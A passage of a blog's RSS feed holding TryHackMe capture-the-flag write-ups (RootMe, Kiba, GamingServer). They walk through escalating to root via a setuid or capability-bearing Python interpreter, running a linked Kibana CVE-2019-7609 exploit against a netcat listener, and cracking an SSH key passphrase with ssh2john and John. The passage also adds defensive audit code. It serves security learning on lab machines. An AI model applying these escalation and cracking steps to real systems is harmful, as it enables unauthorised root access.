<p class="wp-block-paragraph">One that sticks out is the <code>/usr/bin/python</code> file. Since the interpreter itself is setuid root, we might be able to run Python code through it that escalates our privileges to root.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="814" height="312" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/18.-gtfobin.png?resize=814%2C312" alt="GTFObin" class="wp-image-775" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/18.-gtfobin.png?w=814&amp;ssl=1 814w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/18.-gtfobin.png?resize=300%2C115&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/18.-gtfobin.png?resize=768%2C294&amp;ssl=1 768w" sizes="(max-width: 814px) 100vw, 814px" /><figcaption>GTFObin</figcaption></figure>



<p class="wp-block-paragraph">This <a href="https://gtfobins.github.io/gtfobins/python/#suid">python code</a> should spawn an interactive bash shell as root.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="471" height="115" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/19.-root-h.png?resize=471%2C115" alt="RootMe root.txt" class="wp-image-797" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/19.-root-h.png?w=471&amp;ssl=1 471w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/19.-root-h.png?resize=300%2C73&amp;ssl=1 300w" sizes="(max-width: 471px) 100vw, 471px" /><figcaption>root.txt</figcaption></figure>



<p class="wp-block-paragraph">Just like that, after changing our directory to <code>/usr/bin</code> and executing the python code, we are root. The <code>root.txt</code> file is found in the root directory.</p>



<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, RootMe was a fun challenge with a lot to learn from. We enumerated the services running on the machine, bypassed file upload restrictions, and escalated our privileges by abusing SUID permissions. Misconfigured file permissions can give unauthorized users access to resources they were never intended to reach.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="358" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/20.-Task-4-Solutions-1024x358.png?resize=1024%2C358" alt="RootMe Task 4 Solutions" class="wp-image-777" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?resize=1024%2C358&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?resize=300%2C105&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?resize=768%2C269&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/20.-Task-4-Solutions.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 4 Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-rootme/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">438</post-id>	</item>
		<item>
		<title>TryHackMe: Kiba</title>
		<link>https://eric.cc/tryhackme-kiba/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-kiba</link>
					<comments>https://eric.cc/tryhackme-kiba/#comments</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Dec 2021 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=335</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe Kiba is a beginner-level challenge that focuses on enumeration and exploitation of the open source software Kibana.</p>
<p>The post <a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph"><a href="https://tryhackme.com/room/kiba">Kiba</a> is a beginner-level challenge from TryHackMe. The point of this challenge is to &#8220;Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.&#8221; By identifying the vulnerable service and its public CVEs, we can find an exploit that gives us a foothold on the server, then abuse Linux capabilities to escalate privileges to root.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="662" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/06/Task-1-1024x662.png?resize=1024%2C662" alt="Kiba tasks" class="wp-image-485" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?resize=1024%2C662&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?resize=300%2C194&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?resize=768%2C496&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/Task-1.png?w=1210&amp;ssl=1 1210w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 1</figcaption></figure>



<p class="wp-block-paragraph">The first question of this challenge: <strong>What is the vulnerability that is specific to programming languages with prototype-based inheritance?</strong> I did not know the answer, but I did know where to find it. After a quick Google search, we had the answer: <code>Prototype pollution</code>.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="691" height="152" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/prototype-pollution.png?resize=691%2C152" alt="" class="wp-image-537" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/prototype-pollution.png?w=691&amp;ssl=1 691w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/prototype-pollution.png?resize=300%2C66&amp;ssl=1 300w" sizes="(max-width: 691px) 100vw, 691px" /><figcaption>Prototype pollution</figcaption></figure>



<p class="wp-block-paragraph">To start this challenge, we will use Nmap to scan the server for its open ports. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="560" height="1024" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/nmap-h-560x1024.png?resize=560%2C1024" alt="Kiba Nmap results" class="wp-image-722" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?resize=560%2C1024&amp;ssl=1 560w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?resize=164%2C300&amp;ssl=1 164w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?resize=768%2C1404&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/nmap-h.png?w=773&amp;ssl=1 773w" sizes="(max-width: 560px) 100vw, 560px" /><figcaption>Nmap</figcaption></figure>



<p class="wp-block-paragraph">On port 5601, we can see that an application named Kibana is running on the server. Kibana provides &#8220;<a href="https://www.elastic.co/what-is/kibana">search and data visualization capabilities for data indexed in Elasticsearch… It also acts as the user interface for monitoring, managing, and securing an Elastic Stack cluster</a>&#8221;.</p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/app-1024x493.png?resize=840%2C404" alt="Kibana dashboard" class="wp-image-538" width="840" height="404" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=1024%2C493&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=300%2C145&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=768%2C370&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?resize=1536%2C740&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/app.png?w=1918&amp;ssl=1 1918w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption>Kibana Dashboard</figcaption></figure>



<p class="wp-block-paragraph">The answer to the second question is hidden within the website&#8217;s source code: the server is running Kibana version 6.5.4.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="237" height="30" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/version.png?resize=237%2C30" alt="" class="wp-image-539"/><figcaption>Kibana version</figcaption></figure>



<p class="wp-block-paragraph">Now that we know the server is running Kibana version 6.5.4, it&#8217;s time to do some research and find out whether there are any public CVEs related to it.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="869" height="218" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/09/CVE-number.png?resize=869%2C218" alt="" class="wp-image-540" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/CVE-number.png?w=869&amp;ssl=1 869w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/CVE-number.png?resize=300%2C75&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/09/CVE-number.png?resize=768%2C193&amp;ssl=1 768w" sizes="(max-width: 869px) 100vw, 869px" /></figure>



<p class="wp-block-paragraph">CVE-2019-7609, covered on several large cybersecurity blogs, is a vulnerability that allows remote code execution on servers running Kibana version 6.5.4. Luckily, one of the <a href="https://www.tenable.com/blog/cve-2019-7609-exploit-script-available-for-kibana-remote-code-execution-vulnerability">articles</a> that posted about it links to a GitHub repository containing an exploit script.</p>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">All I had to do was download the <a href="https://github.com/LandGrey/CVE-2019-7609/">GitHub repository</a>, set up a netcat listener on port 4444, and run the script.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="775" height="414" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/07/exploit.png?resize=775%2C414" alt="CVE-2019-7609" class="wp-image-511" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/exploit.png?w=775&amp;ssl=1 775w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/exploit.png?resize=300%2C160&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/exploit.png?resize=768%2C410&amp;ssl=1 768w" sizes="(max-width: 775px) 100vw, 775px" /><figcaption>Kiba Exploit</figcaption></figure>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">Finding the <code>user.txt</code> flag was trivial: all I had to do was change my directory to <code>/home/Kiba</code> and use the command <code>cat user.txt</code>.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="625" height="646" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/user-h.png?resize=625%2C646" alt="Kiba user.txt flag" class="wp-image-723" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/user-h.png?w=625&amp;ssl=1 625w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/user-h.png?resize=290%2C300&amp;ssl=1 290w" sizes="(max-width: 625px) 100vw, 625px" /><figcaption>user.txt</figcaption></figure>



<p class="wp-block-paragraph">Questions 5 and 6 give us a direction we can take to gain root privileges. Question 5 does not need to be answered, but it should be noted. Question 6: <strong>How would you recursively list all of these capabilities?</strong> The <code>getcap -r /</code> command will recursively <a href="https://man7.org/linux/man-pages/man8/getcap.8.html">examine file capabilities</a> within the directory. </p>



<p class="wp-block-paragraph">When running this command in the Kiba home directory, we can see that <code>python3 = cap_setuid+ep</code>. This means that, through this binary, I can change my user identifier to <a href="https://medium.com/@gggauravgandhi/uid-user-identifier-and-gid-group-identifier-in-linux-121ea68bf510">any number used to identify the user to the system and to determine which system resources</a> I have access to.</p>



<p class="wp-block-paragraph">This <a href="https://gtfobins.github.io/gtfobins/python/#capabilities">snippet</a> from GTFObins allows me to use python to escalate my privileges to root by setting my uid to 0.</p>
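<p class="wp-block-paragraph">Both of these rooms fall to the same misconfiguration: an interpreter that carries root privilege, once through the setuid bit on <code>/usr/bin/python</code> in RootMe and once through <code>cap_setuid</code> on <code>python3</code> here. The following is an added example in Python (not code from either room or from this post) that turns the two enumeration commands from these write-ups, <code>find / -user root -perm /4000</code> and <code>getcap -r /</code>, into an audit: it parses their output, compares each hit against a per-host baseline, and flags interpreters and unlisted binaries. The baseline sets, the interpreter pattern and the sample command output are assumptions constructed for the example; the <code>find</code> output is assumed to be produced with <code>-printf '%m %u %p\n'</code> so that mode and owner appear on each line.</p>

```python
"""Privileged-executable audit.  Parses the output of the two commands used in
these write-ups, `find / -user root -perm /4000` (run here with
-printf '%m %u %p\\n' so mode and owner are on the line) and `getcap -r /`,
and flags setuid-root or capability-bearing files that are interpreters or
that are missing from a per-host baseline.  Added example; the sample
command output below is constructed, not captured from either room."""
from dataclasses import dataclass
import os
import re

# Setuid-root binaries expected on a stock Ubuntu install.  Assumed list;
# generate the real one from a freshly built image and keep it per host.
SUID_BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/bin/ping",
}
# Capabilities expected per path.  Assumed baseline.
CAP_BASELINE = {"/usr/bin/ping": {"cap_net_raw"}}

# Anything that executes arbitrary code becomes a root shell the moment it
# gains setuid or cap_setuid, which is exactly what RootMe and Kiba hand out.
INTERPRETERS = re.compile(r"(python|perl|ruby|php|node|nodejs|bash|sh|vim|vi|nano)[\d.]*")


@dataclass
class Finding:
    path: str
    reason: str


def parse_find_line(line: str):
    """'4755 root /usr/bin/passwd' -> (path, owner, mode as int), or None."""
    parts = line.split(None, 2)
    if len(parts) != 3:
        return None
    mode, owner, path = parts
    return path, owner, int(mode, 8)


def parse_getcap_line(line: str):
    """Accepts both getcap output styles, '/path = cap_x+ep' (older libcap)
    and '/path cap_x=ep' (newer).  Returns (path, set of capability names)."""
    line = line.strip()
    if not line.startswith("/"):
        return None
    path, _, rest = line.partition(" ")
    return path, set(re.findall(r"cap_[a-z_]+", rest))


def audit(find_output: str, getcap_output: str) -> list:
    """Return one Finding per suspicious setuid or capability-bearing file."""
    findings = []
    for line in find_output.splitlines():
        rec = parse_find_line(line)
        if rec is None:
            continue
        path, owner, mode = rec
        if not (mode & 0o4000) or owner != "root":
            continue                       # only setuid-root is in scope here
        if INTERPRETERS.fullmatch(os.path.basename(path)):
            findings.append(Finding(path, "setuid-root interpreter: any local user gets root"))
        elif path not in SUID_BASELINE:
            findings.append(Finding(path, "setuid-root binary not in baseline"))
    for line in getcap_output.splitlines():
        rec = parse_getcap_line(line)
        if rec is None:
            continue
        path, caps = rec
        if INTERPRETERS.fullmatch(os.path.basename(path)):
            findings.append(Finding(path, f"interpreter with file capabilities {sorted(caps)}"))
        elif caps - CAP_BASELINE.get(path, set()):
            findings.append(Finding(path, f"capabilities outside baseline {sorted(caps)}"))
    return findings


# Constructed sample output, in the shape the two commands produce.
SAMPLE_FIND = """\
4755 root /usr/bin/passwd
4755 root /usr/bin/sudo
4755 root /usr/bin/python
4755 root /opt/backup/helper
"""
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3 = cap_setuid+ep
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_FIND, SAMPLE_GETCAP):
        print(f"{f.path}: {f.reason}")
```

<p class="wp-block-paragraph">Run against the constructed sample, the audit reports the setuid <code>/usr/bin/python</code>, the unlisted <code>/opt/backup/helper</code> and the <code>cap_setuid</code> <code>python3</code>, and stays quiet about <code>passwd</code>, <code>sudo</code> and <code>ping</code>. The interpreter check deliberately fires even when the path is in the baseline, because no baseline should ever contain a privileged interpreter; the remediation is to remove the bit or capability and give the task that needed it a dedicated, minimal binary.</p>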



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="786" height="226" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/root-h.png?resize=786%2C226" alt="privilege escalation" class="wp-image-724" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-h.png?w=786&amp;ssl=1 786w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-h.png?resize=300%2C86&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-h.png?resize=768%2C221&amp;ssl=1 768w" sizes="(max-width: 786px) 100vw, 786px" /></figure>



<p class="wp-block-paragraph">Now that we have rooted the box, we can change to the root directory and read the root.txt flag.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="432" height="195" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/11/root-txt-h.png?resize=432%2C195" alt="Kiba root.txt flag" class="wp-image-725" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-txt-h.png?w=432&amp;ssl=1 432w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/11/root-txt-h.png?resize=300%2C135&amp;ssl=1 300w" sizes="(max-width: 432px) 100vw, 432px" /><figcaption>root.txt</figcaption></figure>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, this was a really fun and straightforward challenge to complete. The questions were able to guide me in the right direction without giving too much away. Through this, I learned about Linux capabilities and how they can be abused to escalate privileges.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="681" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/07/Task-1-Solutions-1024x681.png?resize=1024%2C681" alt="Kiba Solutions" class="wp-image-515" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?resize=1024%2C681&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?resize=300%2C199&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?resize=768%2C511&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/07/Task-1-Solutions.png?w=1211&amp;ssl=1 1211w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 1 Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-kiba/">TryHackMe: Kiba</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-kiba/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">335</post-id>	</item>
		<item>
		<title>TryHackMe: GamingServer</title>
		<link>https://eric.cc/tryhackme-gamingserver/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-gamingserver</link>
					<comments>https://eric.cc/tryhackme-gamingserver/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Sep 2021 14:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">http://eric.cc/?p=92</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe: GamingServer is an easy boot2root challenge on TryHackMe. This challenge simulates a &#8220;gaming server built by amateurs with no experience in web development.&#8221; With an exposed RSA Private Key, we can gain a foothold onto the server and take advantage of lxd, the container manager built on top of LXC, to escalate privileges to root. Information Gathering As always, [&#8230;]</p>
<p>The post <a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<p class="wp-block-paragraph">TryHackMe: <a href="https://tryhackme.com/room/gamingserver">GamingServer</a> is an easy boot2root challenge on TryHackMe. This challenge simulates a &#8220;gaming server built by amateurs with no experience in web development.&#8221; With an exposed, passphrase-protected RSA private key, we can gain a foothold on the server, and with the low-privileged user&#8217;s membership in the lxd group (LXD is the container manager built on top of LXC) we can escalate privileges to root.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<p class="wp-block-paragraph">As always, to start the information gathering phase of this challenge, we will use Nmap to scan all ports at the GamingServer&#8217;s IP address. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="758" height="326" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/nmap.png?resize=758%2C326" alt="GamingServer Nmap results" class="wp-image-447" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/nmap.png?w=758&amp;ssl=1 758w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/nmap.png?resize=300%2C129&amp;ssl=1 300w" sizes="(max-width: 758px) 100vw, 758px" /><figcaption class="wp-element-caption">Nmap results</figcaption></figure>



<p class="wp-block-paragraph">On this Ubuntu Linux machine, 2 of the 65535 TCP ports are open. Port 22 runs OpenSSH 7.6p1 and port 80 runs Apache httpd 2.4.29. Browsing to the IP address shows that the Apache web server is hosting a website called Draagan. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="698" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/website-1-1024x698.png?resize=1024%2C698" alt="GamingServer Draagan website" class="wp-image-450" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?resize=1024%2C698&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?resize=300%2C204&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?resize=768%2C523&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?w=1199&amp;ssl=1 1199w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">GamingServer website</figcaption></figure>



<p class="wp-block-paragraph">It looks like the gaming server&#8217;s website is still under construction.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="695" height="19" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/view-source-username-john.png?resize=695%2C19" alt="Draagan source code." class="wp-image-451" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/view-source-username-john.png?w=695&amp;ssl=1 695w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/view-source-username-john.png?resize=300%2C8&amp;ssl=1 300w" sizes="(max-width: 695px) 100vw, 695px" /><figcaption class="wp-element-caption">HTML source code</figcaption></figure>



<p class="wp-block-paragraph">Viewing the page&#8217;s HTML source, we can see that the developers left a comment addressed to John. From this we can conclude that john is the user account we should be targeting during this assessment. </p>



<p class="wp-block-paragraph">The website itself offers little functionality and no obvious foothold, so the next step is to enumerate the web server for directories and files that are not linked from the page.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="778" height="345" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/gobuster.png?resize=778%2C345" alt="GamingServer Gobuster results" class="wp-image-452" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/gobuster.png?w=778&amp;ssl=1 778w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/gobuster.png?resize=300%2C133&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/gobuster.png?resize=768%2C341&amp;ssl=1 768w" sizes="(max-width: 778px) 100vw, 778px" /><figcaption class="wp-element-caption">Gobuster results</figcaption></figure>



<p class="wp-block-paragraph">Using a tool like Gobuster, we can enumerate the directories and files on the webserver. The results above show that the /uploads and /secret directories could hold valuable information. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="275" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/uploads.png?resize=490%2C275" alt="GamingServer uploads directory" class="wp-image-453" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploads.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploads.png?resize=300%2C168&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">/uploads directory</figcaption></figure>



<p class="wp-block-paragraph">Unless you want to read <a href="http://phrack.org/issues/7/3.html">the hacker manifesto</a> by The Mentor or look at a picture of a shocked Beaker from the Muppets, manifesto.txt and meme.jpg are of no particular value. The file of interest is dict.lst, a wordlist of common passwords, which we download for later use.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="345" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/06/secrets-1024x345.png?resize=1024%2C345" alt="GamingServer secret directory" class="wp-image-503" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?resize=1024%2C345&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?resize=300%2C101&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?resize=768%2C259&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?w=1364&amp;ssl=1 1364w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">/secret directory</figcaption></figure>



<p class="wp-block-paragraph">The /secret directory contains a single file named secretKey. It is a passphrase-protected RSA private key, which can be used to authenticate to the SSH service once we recover the passphrase. </p>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">To start, copy the RSA private key into a file called id_rsa and set its permissions to 600, since ssh refuses to use a private key that is readable by other users. Next, run ssh2john.py over id_rsa to convert it into a hash format that John the Ripper can crack. Finally, crack the passphrase with John, using the dict.lst we copied from the /uploads directory as the wordlist. </p>
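<p class="wp-block-paragraph">Before handing a key to ssh2john it is worth knowing what you are about to crack. The following is an added example, not code from the original write-up: a small parser for the two on-disk formats ssh-keygen writes. It reports whether a key is passphrase-protected, which cipher and key derivation function protect it and, for the modern openssh-key-v1 format, the bcrypt round count. That is the same metadata ssh2john extracts into a john hash line, and the KDF and round count are what decide how quickly a wordlist such as dict.lst runs. The sample keys in the block are constructed for the example; they are not the key from the GamingServer box.</p>

```python
"""Triage an SSH private key before trying to crack its passphrase.

Added example, not code from the original write-up. The sample keys at the
bottom are constructed here and are not the key from the GamingServer box.
"""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def read_ssh_string(buf, off):
    """Parse one SSH wire 'string' (uint32 big-endian length + bytes)."""
    if off + 4 > len(buf):
        raise ValueError("truncated key blob")
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    if off + n > len(buf):
        raise ValueError("truncated key blob")
    return buf[off:off + n], off + n


def triage_key(pem_text):
    """Describe how (and whether) a PEM-armoured private key is encrypted."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN "):
        raise ValueError("not a PEM-armoured key")

    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        # Modern format (ssh-keygen default since OpenSSH 7.8): a binary blob whose
        # clear-text header names the cipher, the KDF and the KDF parameters.
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        cipher, off = read_ssh_string(body, off)
        kdf, off = read_ssh_string(body, off)
        kdfopts, off = read_ssh_string(body, off)
        info = {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "encrypted": cipher != b"none"}
        if kdf == b"bcrypt":
            # kdfoptions = string salt, uint32 rounds; rounds is the cost knob.
            salt, o = read_ssh_string(kdfopts, 0)
            if o + 4 > len(kdfopts):
                raise ValueError("truncated kdfoptions")
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
            info["bcrypt_rounds"] = rounds
            info["salt_len"] = len(salt)
        return info

    # Legacy PEM (ssh-keygen -m PEM, and the default before OpenSSH 7.8):
    # encryption is signalled by RFC 1421 headers, and the key is derived from
    # the passphrase with OpenSSL's single-iteration MD5 EVP_BytesToKey, so
    # these crack orders of magnitude faster than bcrypt-protected keys.
    info = {"format": "pem", "encrypted": False}
    for line in lines[1:]:
        if line.startswith("Proc-Type:") and "ENCRYPTED" in line:
            info["encrypted"] = True
        elif line.startswith("DEK-Info:"):
            algo, _, iv_hex = line.split(":", 1)[1].strip().partition(",")
            info.update(cipher=algo, iv_hex=iv_hex, kdf="EVP_BytesToKey-MD5")
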